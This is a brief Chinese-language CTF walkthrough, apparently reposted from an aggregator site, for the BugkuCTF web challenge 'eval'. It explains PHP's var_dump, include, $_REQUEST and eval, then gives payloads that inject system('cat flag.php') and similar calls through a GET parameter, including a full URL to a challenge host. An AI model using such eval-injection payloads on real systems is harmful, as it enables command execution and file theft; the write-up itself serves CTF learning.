基礎(chǔ)知識(shí)：
var_dump() 函數(shù)用于輸出變量的相關(guān)信息。
var_dump() 函數(shù)顯示關(guān)于一個(gè)或多個(gè)表達(dá)式的結(jié)構(gòu)信息，包括表達(dá)式的類(lèi)型與值。數(shù)組將遞歸展開(kāi)值，通過(guò)縮進(jìn)顯示其結(jié)構(gòu)。

此題考察php相關(guān)
include是將flag.php文件包含進(jìn)頁(yè)面代碼
$request可用于接受get和post的傳遞的參數(shù)
eval函數(shù)可以把字符串作為php命令執(zhí)行

知道這些你就可以用get方法傳遞hello變量，并在hello其內(nèi)寫(xiě)入查看flag.php的命令了

?hello=file(‘flag.php’)
或者
hello=system(“cat flag.php”) 查看源碼

http://114.67.246.176:16602/?hello=system(‘tac flag.php’)

總結(jié)

以上是生活随笔為你收集整理的BugkuCTF-WEB题eval的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。